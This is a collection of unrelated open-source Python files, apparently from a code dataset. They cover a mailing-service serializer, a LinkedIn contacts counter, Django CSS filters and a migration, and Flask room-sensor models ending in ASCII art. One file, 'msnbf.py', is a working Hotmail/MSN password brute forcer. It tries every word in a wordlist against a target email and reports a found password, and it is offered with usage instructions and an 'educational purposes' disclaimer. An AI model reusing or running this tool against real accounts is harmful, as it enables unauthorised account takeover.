# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with CloudMailing. If not, see <http://www.gnu.org/licenses/>.
import email
import email.parser
import email.policy
import logging
import re
from datetime import timedelta, datetime
import dateutil.parser
import txmongo.filter
from twisted.internet import defer
from ..common.encoding import force_text
from .api_common import compute_hourly_stats
from ..common.db_common import get_db
from . import models
from ..common import settings
from ..common.rest_api_common import NotFound
__author__ = 'Cedric RICARD'
log = logging.getLogger('api')
class Serializer(object):
"""
    Base class to serialize/deserialize objects to/from JSON or XML-RPC `struct` format
"""
fields = []
model_class = None
id_field = '_id'
def __init__(self, instance=None, data=None, fields_filter=None, many=False):
self._collection = self.model_class and get_db()[self.model_class._get_name()] or None
self._instance = instance
self._data = data
self._fields_filter = fields_filter or []
if fields_filter == 'total':
self._fields_filter = ['.total']
elif fields_filter == 'none':
self._fields_filter = []
elif fields_filter == 'default_with_total':
self._fields_filter = self.fields + ('.total',)
elif fields_filter == 'default' or fields_filter is None:
self._fields_filter = self.fields
# elif not isinstance(fields_filter, (list, tuple)):
# raise ValueError("Bad value for 'fields_filter' (was '%s')" % fields_filter)
else:
self._fields_filter = fields_filter or []
self._many = many
@property
def filtered_fields(self):
return list(set(self.fields) & set(self._fields_filter))
def make_filter(self, args):
_filter = {}
for field, value in list(args.items()):
if isinstance(value, (list, tuple)):
_filter[field] = {'$in': value}
elif isinstance(value, str):
_filter[field] = {'$regex': '.*' + re.escape(value) + '.*'}
else:
_filter[field] = value
return _filter
def make_get_filter(self, object_id):
"""
Compose the filter used to retrieve an object by its id.
Defaults to using `{_id: object_id}`.
You may want to override this if you need to provide different logic.
"""
return {self.id_field: object_id}
@defer.inlineCallbacks
def get(self, id):
try:
obj = yield self._collection.find_one(self.make_get_filter(id), fields=self.filtered_fields)
if obj:
obj['id'] = obj.pop('_id')
if 'subject' not in obj and 'subject' in self.filtered_fields and 'header' in obj:
parser = email.parser.BytesHeaderParser(policy=email.policy.default)
msg = parser.parsebytes(obj['header'])
obj['subject'] = msg.get('Subject')
defer.returnValue(obj)
raise NotFound
except IndexError:
raise NotFound
except defer._DefGen_Return:
raise
except:
log.exception("Error in Serializer.get()")
raise
@staticmethod
def make_tx_sort_filter(sort):
if sort is None:
return None
if isinstance(sort, str):
return txmongo.filter.sort(txmongo.filter.ASCENDING(sort))
def _get_direction(value):
if value > 0:
return txmongo.filter.ASCENDING
return txmongo.filter.DESCENDING
assert(isinstance(sort, (list, tuple)))
if len(sort) == 2 and isinstance(sort[0], str):
            return txmongo.filter.sort(_get_direction(sort[1])(sort[0]))
return txmongo.filter.sort(sort)
@defer.inlineCallbacks
def find(self, spec, skip=0, limit=settings.PAGE_SIZE, sort=None):
_filter = self.make_filter(spec)
# log.debug("find() filter: %s", _filter)
results = yield self._collection.find(_filter, fields=self.filtered_fields, skip=skip, limit=limit,
filter=self.make_tx_sort_filter(sort))
items = []
for obj in results:
if '_id' in obj:
obj['id'] = obj.pop('_id')
items.append(obj)
response = {
'items': items
}
if '.total' in self._fields_filter:
response['total'] = yield self._collection.count(_filter)
defer.returnValue(response)
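# A minimal standalone sketch of the header-parsing approach used in
# Serializer.get() above: only the stored raw header bytes are parsed, which
# is enough to recover the Subject without touching the message body.
#
#   import email.parser
#   import email.policy
#   parser = email.parser.BytesHeaderParser(policy=email.policy.default)
#   msg = parser.parsebytes(b"Subject: Hello\r\nFrom: a@example.org\r\n\r\n")
#   assert msg.get("Subject") == "Hello"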
class UserSerializer(Serializer):
model_class = models.User
fields = (
'_id', 'username', 'is_superuser', 'groups'
)
class MailingSerializer(Serializer):
"""
Mailing serializer
"""
model_class = models.Mailing
fields = (
'_id', 'domain_name', 'satellite_group', 'owner_guid',
'mail_from', 'sender_name', 'subject', 'status',
'type', 'tracking_url', 'dkim',
'header',
'dont_close_if_empty',
'submit_time', 'scheduled_start', 'scheduled_end', 'scheduled_duration',
'start_time', 'end_time',
'total_recipient', 'total_sent', 'total_pending', 'total_error',
'total_softbounce',
'read_tracking', 'click_tracking', 'mailing', 'url_encoding',
)
def make_filter(self, args):
mailings_filter = {}
if args:
available_filters = ('domain', 'id', 'status', 'owner_guid', 'satellite_group')
for key in list(args.keys()):
if key not in available_filters:
log.error("Bad filter name '%s'. Available filters are: %s", key, ', '.join(available_filters))
raise ValueError("Bad filter name '%s'. Available filters are: %s" % (key, ', '.join(available_filters)))
if 'domain' in args:
domain = args['domain']
if isinstance(domain, str):
mailings_filter['domain_name'] = domain
else:
mailings_filter['domain_name'] = {'$in': domain}
if 'id' in args:
value = args['id']
ids_list = isinstance(value, (list, tuple)) and value or [value]
mailings_filter['_id'] = {'$in': ids_list}
if 'status' in args:
value = args['status']
status_list = isinstance(value, (list, tuple)) and value or [value]
for status in status_list:
available_status = models.relay_status
status = force_text(status)
if status not in available_status:
log.error("Bad status '%s'. Available status are: %s",
status, ', '.join(available_status))
raise ValueError("Bad status '%s'. Available status are: %s"
% (status, ', '.join(available_status)))
mailings_filter['status'] = {'$in': list(map(force_text, status_list))}
if 'owner_guid' in args:
owners = args['owner_guid']
if isinstance(owners, str):
mailings_filter['owner_guid'] = owners
else:
mailings_filter['owner_guid'] = {'$in': owners}
if 'satellite_group' in args:
satellite_groups = args['satellite_group']
if isinstance(satellite_groups, str):
mailings_filter['satellite_group'] = satellite_groups
else:
mailings_filter['satellite_group'] = {'$in': satellite_groups}
return mailings_filter
class RecipientSerializer(Serializer):
"""
Recipient serializer
"""
model_class = models.MailingRecipient
fields = (
'_id', 'email', 'send_status', 'tracking_id',
'reply_code', 'reply_enhanced_code', 'reply_text', 'smtp_log',
'modified',
'first_try', 'next_try', 'try_count',
'in_progress',
'cloud_client',
)
id_field = 'tracking_id'
@property
def filtered_fields(self):
return list(set(self.fields) & (set(self._fields_filter) | {'tracking_id'}))
@defer.inlineCallbacks
def get(self, id):
recipient = yield super(RecipientSerializer, self).get(force_text(id))
recipient.pop('id')
recipient['id'] = recipient.pop('tracking_id')
defer.returnValue(recipient)
def make_filter(self, args):
_args = args.copy()
if 'mailing' in _args:
_args['mailing.$id'] = _args.pop('mailing')
smtp_reply = _args.pop('smtp_reply', None)
_args = super(RecipientSerializer, self).make_filter(_args)
if smtp_reply:
_args.setdefault('$and', []).append({'$or': [
{'reply_code': smtp_reply},
super(RecipientSerializer, self).make_filter({'reply_text': smtp_reply}),
]})
return _args
class SatelliteSerializer(Serializer):
model_class = models.CloudClient
fields = (
'_id', 'serial', 'enabled', 'paired', 'date_paired', 'shared_key', 'domain_affinity', 'group', 'version',
'settings'
)
class HourlyStatsSerializer(Serializer):
model_class = models.MailingHourlyStats
fields = (
'sender', 'date', 'epoch_hour', 'sent', 'failed', 'tries'
)
# def make_filter(self, args):
# _args = args.copy()
# from_date = dateutil.parser.parse(_args.pop('from_date', None))
# to_date = _args.pop('to_date', None)
# _args.setdefault('date', {})['$gte'] = from_date
# if not to_date:
# to_date = from_date + timedelta(hours=999)
# else:
# to_date = dateutil.parser.parse(to_date)
# _args.setdefault('date', {})['$lte'] = to_date
# _args = super(HourlyStatsSerializer, self).make_filter(_args)
# return _args
def find(self, spec, skip=0, limit=settings.PAGE_SIZE, sort=None):
_args = spec.copy()
        from_date = _args.pop('from_date', None)
        if not from_date:
            from_date = datetime.now() - timedelta(hours=24)
        else:
            from_date = dateutil.parser.parse(from_date, ignoretz=True)
to_date = _args.pop('to_date', None)
_args = self.make_filter(_args)
_args.setdefault('date', {})['$gte'] = from_date
if not to_date:
to_date = from_date + timedelta(hours=999)
else:
to_date = dateutil.parser.parse(to_date, ignoretz=True)
_args.setdefault('date', {})['$lte'] = to_date
response = {
'items': compute_hourly_stats(_args, from_date, to_date)
}
return response
license: agpl-3.0 | hash: 2,927,350,094,673,577,500 | line_mean: 36.217532 | line_max: 125 | alpha_frac: 0.567914 | autogenerated: false | ratio: 3.977446 | config_test: false | has_no_keywords: false | few_assignments: false

---
repo_name: peterorum/data-hmm | path: linkedin/by-company.py | copies: 1 | size: 1337
content:
#!/usr/bin/python
import os
import csv
from collections import Counter
from operator import itemgetter
from prettytable import PrettyTable
# XXX: Place your "Outlook CSV" formatted file of connections from
# http://www.linkedin.com/people/export-settings at the following
# location: resources/ch03-linkedin/my_connections.csv
CSV_FILE = os.path.join("private", 'linkedin-connections.csv')
# Define a set of transforms that converts the first item
# to the second item. Here, we're simply handling some
# commonly known abbreviations, stripping off common suffixes,
# etc.
transforms = [(', Inc.', ''), (', Inc', ''), (', LLC', ''), (', LLP', ''),
(' LLC', ''), (' Inc.', ''), (' Inc', ''), (' AU', ''), (' Australia', ''),
(' Pty Ltd', ''), (' Ltd', '')]
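# For illustration: each transform is an (old, new) pair that the loop below
# applies via tuple unpacking, e.g.
#   'Acme, Inc.'.replace(*(', Inc.', ''))   # -> 'Acme'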
csvReader = csv.DictReader(open(CSV_FILE), delimiter=',', quotechar='"')
contacts = [row for row in csvReader]
companies = [c['Company'].strip() for c in contacts if c['Company'].strip() != '']
for i, _ in enumerate(companies):
for transform in transforms:
companies[i] = companies[i].replace(*transform)
pt = PrettyTable(field_names=['Company', 'Freq'])
pt.align = 'l'
c = Counter(companies)
[pt.add_row([company, freq])
for (company, freq) in sorted(c.items(), key=itemgetter(1), reverse=True)
if freq > 1]
print pt
license: mit | hash: -3,733,075,963,262,727,700 | line_mean: 29.409091 | line_max: 91 | alpha_frac: 0.646223 | autogenerated: false | ratio: 3.463731 | config_test: false | has_no_keywords: false | few_assignments: false

---
repo_name: leleobhz/scripts | path: python/others_utilities/msnbf.py | copies: 1 | size: 3708
content:
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Hotmail brute forcer
# programmer : gunslinger_
# Inspired by mywisdom
# This program is for educational purposes only.
import sys, time, msnp
__Author__ = "Gunslinger_ - Modified by Leleobhz"
__Version__ = "1.0"
__Date__ = "Mon, 22 Feb 2010 13:13:43 +0700 "
log = "msnbrute.log"
file = open(log, "a")
counter = 0
face = '''
MSN brute forcer
programmer : %s
version : %s
date release : %s
''' % (__Author__, __Version__, __Date__)
help = '''
Usage : ./msnbf.py -u [email] -w [wordlist]
Example : ./msnbf.py -u suckthedick@hotmail.com -w wordlist.txt
'''
for arg in sys.argv:
if arg.lower() == '-u' or arg.lower() == '--user':
email = sys.argv[int(sys.argv.index(arg))+1]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-h' or arg.lower() == '--help':
print face
print help
file.write(face)
file.write(help)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except(IOError):
print "\n[-] Error: Check your wordlist path\n"
file.write("\n[-] Error: Check your wordlist path\n")
sys.exit(1)
def definer():
print "-" * 60
print "[+] Email : %s" % email
print "[+] Wordlist : %s" % wordlist
print "[+] Length wordlist : %s " % len(words)
print "[+] Time Starting : %s" % time.strftime("%X")
print "-" * 60
file.write ("\n[+] Email : %s" % email)
file.write ("\n[+] Wordlist : %s" % wordlist)
file.write ("\n[+] length wordlist : %s " % len(words))
file.write ("\n[+] Time Starting : %s" % time.strftime("%X"))
class msnnologin(Exception):
def __init__(self, output):
self.output = output
def __str__(self):
return repr(self.output)
def msnparse():
def state_changed(self, state):
if state == "New state: NLN":
return 0
else:
raise msnnologin(state)
def main(password):
global counter
sys.stdout.write ("[-] Trying : %s \n" % (password))
sys.stdout.flush()
file.write("[-] Trying : %s \n" % (str(password)))
try:
msntmp = msnp.Session(msnparse())
msntmp.login(email, password)
print "[+] W00t w00t !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Valid!" % (email, password)
file.write("[+] W00t w00t !!!\n[+] Username : [%s]\n[+] Password : [%s]\n[+] Status : Valid!" % (email, password))
sys.exit(1)
except msnp.error.HttpError:
exit
except msnnologin:
exit
except KeyboardInterrupt:
print "\n[-] Aborting...\n"
file.write("\n[-] Aborting...\n")
sys.exit(1)
counter+=1
if counter == len(words)/5:
print "[+] Hotmailbruteforcer 20% way done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on 1/4 way done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words)/4:
print "[+] Hotmailbruteforcer 25% way done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on 1/4 way done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words)/2:
print "[+] Hotmailbruteforcer on 50% done..."
print "[+] Please be patient..."
file.write("[+] hotmailbruteforcer on halfway done...\n")
file.write("[+] Please be patient...\n")
elif counter == len(words):
print "[+] Hotmailbruteforcer done...\n"
file.write("[+] Hotmailbruteforcer done...!\n")
msntmp.logout()
if __name__ == '__main__':
print face
file.write(face)
definer()
for password in words:
main(password.replace("\n",""))
main(password)
license: gpl-2.0 | hash: -3,270,820,469,121,388,000 | line_mean: 29.393443 | line_max: 118 | alpha_frac: 0.591963 | autogenerated: false | ratio: 2.926598 | config_test: false | has_no_keywords: false | few_assignments: false

---
repo_name: kottenator/django-compressor-toolkit | path: compressor_toolkit/filters.py | copies: 1 | size: 3854
content:
import logging
import os
import re
from compressor.filters.css_default import CssAbsoluteFilter
from compressor.filters.datauri import CssDataUriFilter as BaseCssDataUriFilter
from django.apps import apps
from django.conf import settings
app_config = apps.get_app_config('compressor_toolkit')
logger = logging.getLogger(__file__)
class CssRelativeFilter(CssAbsoluteFilter):
"""
Do similar to ``CssAbsoluteFilter`` URL processing
but replace ``settings.COMPRESS_URL`` prefix with '../' * (N + 1),
where N is the *depth* of ``settings.COMPRESS_OUTPUT_DIR`` folder.
E.g. by default ``settings.COMPRESS_OUTPUT_DIR == 'CACHE'``,
its depth N == 1, prefix == '../' * (1 + 1) == '../../'.
If ``settings.COMPRESS_OUTPUT_DIR == 'my/compiled/data'``,
its depth N == 3, prefix == '../' * (3 + 1) == '../../../../'.
How does it work:
- original file URL: '/static/my-app/style.css'
- it has an image link: ``url(images/logo.svg)``
- compiled file URL: '/static/CACHE/css/abcdef123456.css'
- replaced image link URL: ``url(../../my-app/images/logo.svg)``
"""
def add_suffix(self, url):
url = super(CssRelativeFilter, self).add_suffix(url)
old_prefix = self.url
if self.has_scheme:
old_prefix = '{}{}'.format(self.protocol, old_prefix)
# One level up from 'css' / 'js' folder
new_prefix = '..'
# N levels up from ``settings.COMPRESS_OUTPUT_DIR``
new_prefix += '/..' * len(list(filter(
None, os.path.normpath(settings.COMPRESS_OUTPUT_DIR).split(os.sep)
)))
return re.sub('^{}'.format(old_prefix), new_prefix, url)
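# A minimal sketch of the prefix arithmetic documented in the class docstring
# above, shown standalone (the output_dir value is illustrative):
#
#   import os
#   output_dir = 'my/compiled/data'  # depth N == 3
#   depth = len([p for p in os.path.normpath(output_dir).split(os.sep) if p])
#   prefix = '..' + '/..' * depth    # -> '../../../..', i.e. '../' * (N + 1)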
class CssDataUriFilter(BaseCssDataUriFilter):
"""
Override default ``compressor.filters.datauri.CssDataUriFilter``:
- fix https://github.com/django-compressor/django-compressor/issues/776
- introduce new settings - ``COMPRESS_DATA_URI_INCLUDE_PATHS`` and
``COMPRESS_DATA_URI_EXCLUDE_PATHS`` - to filter only specific file paths or extensions,
e.g. ``settings.COMPRESS_DATA_URI_INCLUDE_PATHS = '\.svg$'``.
"""
def input(self, filename=None, **kwargs):
if not filename:
return self.content
# Store filename - we'll use it to build file paths
self.filename = filename
output = self.content
for url_pattern in self.url_patterns:
output = url_pattern.sub(self.data_uri_converter, output)
return output
def data_uri_converter(self, matchobj):
url = matchobj.group(1).strip(' \'"')
# Don't process URLs that start with: 'data:', 'http://', 'https://' and '/'.
# We're interested only in relative URLs like 'images/icon.png' or '../images/icon.svg'
if not re.match('^(data:|https?://|/)', url):
file_path = self.get_file_path(url)
# Include specific file paths (optional)
file_path_included = bool(
not hasattr(settings, 'COMPRESS_DATA_URI_INCLUDE_PATHS') or
re.match(settings.COMPRESS_DATA_URI_INCLUDE_PATHS, file_path)
)
# Exclude specific file paths (optional)
file_path_excluded = bool(
hasattr(settings, 'COMPRESS_DATA_URI_EXCLUDE_PATHS') and
re.match(settings.COMPRESS_DATA_URI_EXCLUDE_PATHS, file_path)
)
if file_path_included and not file_path_excluded:
try:
return super(CssDataUriFilter, self).data_uri_converter(matchobj)
except OSError:
logger.warning('"{}" file not found'.format(file_path))
return 'url("{}")'.format(url)
def get_file_path(self, url):
file_path = re.sub('[#?].*$', '', url)
return os.path.abspath(os.path.join(os.path.dirname(self.filename), file_path))
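# A minimal settings sketch for the path filtering above (regex values are
# illustrative; note that re.match() anchors at the start of the absolute
# file path, so the patterns must cover the leading part of the path):
#
#   COMPRESS_DATA_URI_INCLUDE_PATHS = r'.*\.svg$'     # inline only SVG files
#   COMPRESS_DATA_URI_EXCLUDE_PATHS = r'.*/sprites/'  # ...except sprite sheets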
license: mit | hash: 1,912,537,893,408,338,700 | line_mean: 38.731959 | line_max: 95 | alpha_frac: 0.608978 | autogenerated: false | ratio: 3.69511 | config_test: false | has_no_keywords: false | few_assignments: false

---
repo_name: adam2392/smile | path: smile/accounts/migrations/0002_auto_20160313_1723.py | copies: 1 | size: 1197
content:
# -*- coding: utf-8 -*-
# Generated by Django 1.9.3 on 2016-03-13 17:23
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('admins', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('accounts', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='UserProfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.DeleteModel(
name='AvailableProject',
),
migrations.AddField(
model_name='userprofile',
name='project',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='admins.AvailableProject'),
),
migrations.AddField(
model_name='userprofile',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
]
license: apache-2.0 | hash: -3,652,358,345,451,040,300 | line_mean: 30.5 | line_max: 114 | alpha_frac: 0.60401 | autogenerated: false | ratio: 4.352727 | config_test: false | has_no_keywords: false | few_assignments: false

---
repo_name: dimitdim/GetARoom | path: Main/app/models.py | copies: 1 | size: 13192
content:
__author__ = 'kflores'
"""
Model that defines the class structure of the database.
"""
from app import db
ROLE_USER = 0
ROLE_ADMIN = 1
class Node(db.Model):
"""class representation of one networked sensor kit hooked into ethernet. Instatiation requires the name, ip address, and location of the "node", but all of these values should be placed into the config file (see get_node_config(filename) in download_data.py)
"""
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String)
ip = db.Column(db.String)
loc = db.Column(db.String, index=True, unique=True)
data = db.relationship('Data', backref='origin', lazy='dynamic')
status = db.relationship('Status', backref='origin', lazy='dynamic')
def __init__(self, name, ip, loc):
self.name = name
self.ip = ip
self.loc = loc
def __repr__(self):
return '%s is at %s in %s' % (self.name, self.ip, self.loc)
class Data(db.Model):
"""
    Class representation of one data row in the data table. This object records the local time, node uptime, brightness, temperature, door IR sensor, and the time the door was last opened. Volume is a placeholder for a feature that is not yet implemented. node_id ties the Data objects to the Node object that created them (the location they are at).
"""
id = db.Column(db.Integer, primary_key=True)
localtimestamp = db.Column(db.Integer)
uptime = db.Column(db.Integer)
brightness = db.Column(db.Integer)
temperature = db.Column(db.Integer)
volume = db.Column(db.Integer)
door = db.Column(db.Integer)
last_opened = db.Column(db.Integer)
node_id = db.Column(db.Integer, db.ForeignKey("node.id"))
def __init__(self, localtimestamp, uptime, brightness, temperature, volume, door, last_opened, origin):
self.localtimestamp = localtimestamp
self.uptime = uptime
self.brightness = brightness
self.temperature = temperature
self.volume = volume
self.door = door
self.last_opened = last_opened
self.origin = origin
def __repr__(self):
return "Light: %s, Temp: %s, Last: %s" % (self.brightness, self.temperature, self.last_opened)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
nickname = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
role = db.Column(db.SmallInteger, default=ROLE_USER)
temp = db.Column(db.String(4), default='f')
posts = db.relationship('Post', backref='author', lazy='dynamic')
def is_authenticated(self):
return True
def is_active(self):
return True
def is_anonymous(self):
return False
def get_id(self):
return unicode(self.id)
def __repr__(self):
return '<User %r>' % (self.nickname)
class Post(db.Model):
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.String(140))
timestamp = db.Column(db.DateTime)
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
def __repr__(self):
return '<Post %r>' % (self.body)
class Status(db.Model):
"""
    Object for storing room status values. An analysis routine that processes sensor data and reaches a conclusion on room state will instantiate these objects. WIP.
"""
id = db.Column(db.Integer, primary_key=True)
start = db.Column(db.Integer)
status = db.Column(db.Boolean)
node_id = db.Column(db.Integer, db.ForeignKey("node.id"))
def __init__(self, start, status, origin):
self.start = start
self.status = status
self.origin = origin
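# A minimal usage sketch for the models above (values and the db.session
# workflow are illustrative; names follow the constructors defined here):
#
#   node = Node(name="node-1", ip="192.168.1.50", loc="library")
#   db.session.add(node)
#   db.session.commit()
#   reading = Data(localtimestamp=1400000000, uptime=3600, brightness=512,
#                  temperature=72, volume=0, door=1, last_opened=1399999000,
#                  origin=node)
#   db.session.add(reading)
#   db.session.commit()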
#=======================ittVBBBMMMWMMMMMMMMMMWWWWWWWWWWMMWWMMBRRRXYIi=================================================
#=======================iIXBRBMMMMWWWWWWMMMMMMWWWWMMMMMMMWWWWWMMMWRYt+================================================
#======================+YRBBMMMMMWWWWWWMMMMMMMMWWWWWWMMMWWWWWWMMMWWBVt================================================
#=====================+tRMBMMWWMWWWWWMMMMMMMMMMMWWWWWWWWWWWWWWWWMWMMBY================================================
#====================+tIRMWMWWWWMWWWWMMMMMMMMMMMWWWWWWWWWWMMWMWWMWWWMR================================================
#===================iYtVBWMMWWMWWWWWMMMMMMMMMMMMWWWWWWWWWWWMMMWWWWWWWMV+=;============================================
#==================+VXRBMWMMMMWWMMWWWWWMMMMMMMWMWWWWWWWWWWWWWWWWWWWWWBXY+=;===========================================
#=================;iXXMMMMWMWWWMBMMMWWMMWMMMMMMMMMWWWWWWWWWWWWWWWWWWWMVVi=;===========================================
#==================YBMBMWWWMWWMMMMMBMMMMBMBMMMMMMMMMWMMMMWWWWWWWMWWWWWMVi;=;==========================================
#=================tBMBMMWWMMMBMMWWWWMBMMMBBMMMMMMWMMMBBMMMWWWWWWWWWWWWWBY=;===========================================
#================+RMBBMMWWMWMBMWWWWWWWBBBRBMMMMMMWWMMBBBBMWWWWWWWWWWWWWWXi============================================
#================tMMMMMMWMWWMMWWWMMMWWMBRRRBXBMMWMMMMBBRRRBMWWWWWWWWWWWWBI+=;=========================================
#================IMMWMWMMWWWWWWWMBMMMWWMRXXXVRBBMBBMMBRXVVVRBWW#WWWMWWWWMRt==;;=======================================
#================VMMWMWWWWWWWWMMMMMMMBMBRVVVXRXBRBBBRRXVYYYVRBWWWWWWWWWWMMXY+;========================================
#===============tRMWWWWWWWWWWWWMMMMBRRRRXVYVVVVXXRRXVVYYIYYYVRMMWWWWWWWWWWBV==========================================
#===============YMMWWWWWWWWWWMMBBBBBBRXXVVVVYYVYXRXVYIIIIIYVVXRMWWWWWWWWWMBY==========================================
#============;=+XMMWWWWW##WWMRRRRRRRRXXVYYYYYYVVXXYIIIIIIYYVVVXBWWWWWWWWWWMI;;========================================
#============;IXBWMWWWWW#WWWBXVVVVVVYYYYIIttIYVVYIIIIIIIIYYVVVXBMWWWWWWWWWMY=;========================================
#============+XMMWWWWWWWWWWMRXVVYYYIIIItIIiitIIttttItIIIIYYVVVXRMMWWWWWWWMMY==========================================
#============tVMWWWWWWWWWWMBRXVYYYIIItttttiittiiittttIIIYYYYVVXRMMWWWWWWWMBI==;=======================================
#============iXWWWWW#WMW#WMRRXVYYYIIttttttiiiiiitiittIIIYYYYYVVRMWWWWWWWWMVt==========================================
#=============VWWWWWWWW##WMRXXVVYYIIttiiiii+iiitiittIIIIIIYYYYVXBWWWWWWWWBYi=;========================================
#=============VWWWWWMWW##WMRXXVVYYIIIIti++iiiiiiittttIIIIIIIYYVVXMWWWWWWMBYi;;========================================
#============+IBWMMMMW##WWBRXXVYYYIIIttii+iiiiiitttttttttIVVYYYYYBWWWWWMBBXi;;========================================
#============itXWWWWWWW##WMRXVVVYYYIIttiiiii++iiiiiiiIYVXBBRRXVYYRWWWMBWBRV=;;========================================
#============+IVBWW#WW###WMRXVVYYYIIIttiiiiiiiiiiiitYRBBMBXXXRXYYVMWMBRWWXi=;;========================================
#=============tIXMW#WWWW#WMRXVVYIIIIttiiiiiiiiiiiitYXRXXVYIIIYYYIYBMRXRWWX+;;;========================================
#=============+IYXBWWWWW#WBXVVVYYYYYYYItiiii++++iiIYVVYYItIItIIIIIXMBXRWMV+=;=========================================
#==============tYYRW#WWWWWBVVVVVRRBBBBRXYtii+++++iIYYIYYYIYIIIIIIIVBMXRWRI+=;=========================================
#==============iIYRWWWMWWWRVYVXBMMMMRRXXVtii+++++itIYVXVVXXXYYIIIIYRBXVRYi=;;=========================================
#===============tYXMWMBWWWRYYYRRXVVVVVVVYYti+++++iIYVXVRRYVRRVItIIIXBXYVIi=;;;;=======================================
#===============+IXMWRVMWWRYYYXVIIIIYYVVVYItiiiiitYVXYVMMI+YRYttIIIVBVIIIi=;;=========================================
#================iVMWRYBMWRYYYVYIIYYVVXXXVVYItiitYVVV+YBMViYXYIttIIYRYtIt+=;;=========================================
#=================YBMBIRMWRYYYYYYYXRRRMRYXXXVIiitYYYI+=XXtIVVYIttIIYRVtti;;;;=========================================
#===============++iRMMVVWMRYIYYYYXRRtBBBitVVVYtitYYYYYIttYVVYIttttIYXVtt+;============================================
#================+tVBMRYXBRYIIIYYXRYiRMBi+IVVYtitIYYYYYYVVYYItttttIYVYtti+++++++ii++++++==============================
#================+tIVXMYtRBYYIIIIYXVItVItYVYYYIttIIIIIIIIIIIttittIIYYVIti+iiiiiiiiiiiiii++++==========================
#=================itIYXYtVBYYIttIYVXXXYYVYIIYYItitIIttittttttiiitttIYVItiiiiiiiiiiiiiiiiiiiii+========================
#=================+tIIYYIYRVYIIttIIYVVVYYIttYYItitIIttii++i+iiiittIIYYiiiiiiiiiiiiiiiiiiiiiiii++======================
#==================+ttYIItXXYIItttttIYIItiiIYYItittItttii++++iitttIIVViiiiiittttttttttttttttiiii++====================
#====================tIIttYXYYIttiitttttiittYYItiitIIIIiiiiiiiittIIIVViiitttttttttttttttttttttttii++==================
#=====================iIttYXYYIItiiiiiii+iiIYIIt+itttIYYtiiiiiittIIYVViittttttttttttttttitttttttttii+=================
#=====================+tItIXVYIIttiii+++iitYIIIi++ititYYYIitttttIIYYXYtiiittttttttttttttttttttttttttii+===============
#==================;=;=tIttXVYIIIttii+++iiIYttIi++itttIIYYIIttIIIYYVXYttiittttttttttttttttttttttttttttii+=============
#====================;=iYVVRXYYIIttiiiiiitYYttItiitYYYIIIYVYIIIYYYYVXItttitttttttttttttttttttttttttttttti+============
#===================;;=itYVRXVYYIIttiiiiiIYYYYVYIIIYYYIIYYVVVYYYYYYVXItttittttttttttttttttttttttttttttttti+==+========
#====================;=itIVRRVVYIIItttttIYYYYYYYIIttIIIIYVVXVVYYYVVXXItttitttttttttttttttttttttttttttttttti+==========
#=====================+ttIYBRXVYYYIIItttIVYYYIItiiiitItIIYVVVVYYVYVRVIttttttttttttttttttttttttttttttttttttti+=========
#===================+iitttYBBXXVYYYIIIIIVVYYIIItiiiitYYYVVVVVYYYVYVRVItttttttttttttttttttttttttttttttttttttti+===+====
#=================+iiiitttYRBRXVVVYYYIYYXVVYIIIIItIIIItYXVXXVYYYYYXRYIttttttttttttttttttttttttttttttttttttttti+=======
#==============+++itiiitttIXRRXXXVYYYYYYXVVYVVYIIti=;=iYVtVVVYYYYVRRIIItttitttttttttttttttttttttttttttttttttttt++==+==
#=============+iitttiiitttIYRRRXXVVYYYYYVVXXXVt+=;=;+tttYtYVVYYYVVRRIIIttttttttttttttttttttttttttttttttttttttttti+=+==
#==========++iittttttiittIIYXRRRXXVYYYYYYVXXYVIttitttiitItYYVYYVVXRRIIIttttttttttttttttttttttttttttttttttttttIItti+===
#=========+iitttttttttttttIYVXRRRXVYYYYYYYXVttYiiiiiiiiIIIIYVVVVVRRRIIItttttttttttttttttttttttttttttttttttttttIIIti===
#======+++iiitttttttttttttIYYVRBRRXVVVYYIYVVItYti++iiitItIIYVVVVXRRRYIItttttttttttttttttttttttttttttttttttttttIIIIti==
#++===++iiitttttttttttttttIYYVXRRRRXVYYYYYVYIttItiititIItIYVVVVXXRRRIIItttttttttttttttttttttttttttttttttttttttIIIIIt+=
#===++iittttttttttttttttttIIYYVRBRRXXVVYYYVVYIitYIIIIYVYIIYVVVXXRXRRIIIttttttttttttttttttttttttttttttttttttttttIIIIIt=
#=++iittttttttttttttttttttIIYYYXBRRRXXVVYYVVVIttYYIIIYYIIIYVVVXRRXRRIItttItttttttttttttttttttttttttttttttttttttIIIIII=
#+iiitttttttttttttttttttttIIIYYYRRRRRXVVVYVVVYIttIIIYIttIYYVVXXRRXBXIIttIItttttttttttttttttttttttttttttttttttttIIIIII+
#ittitttttttttttttttttttttIIIYYYVRRRRRXXXVVVVVVItttiiitIYYVYVXXRRXBXIIttIttttttttttttttttttttttttttttttttIttttttIIIIIi
#ttttttttttttttttttttttttttIIIIYYXRXBBXXXXVYVXXVIItttIIYVVVYXRRRRXMXIItttttttttttttttttttttttttttttttttttIttttttIIIIIt
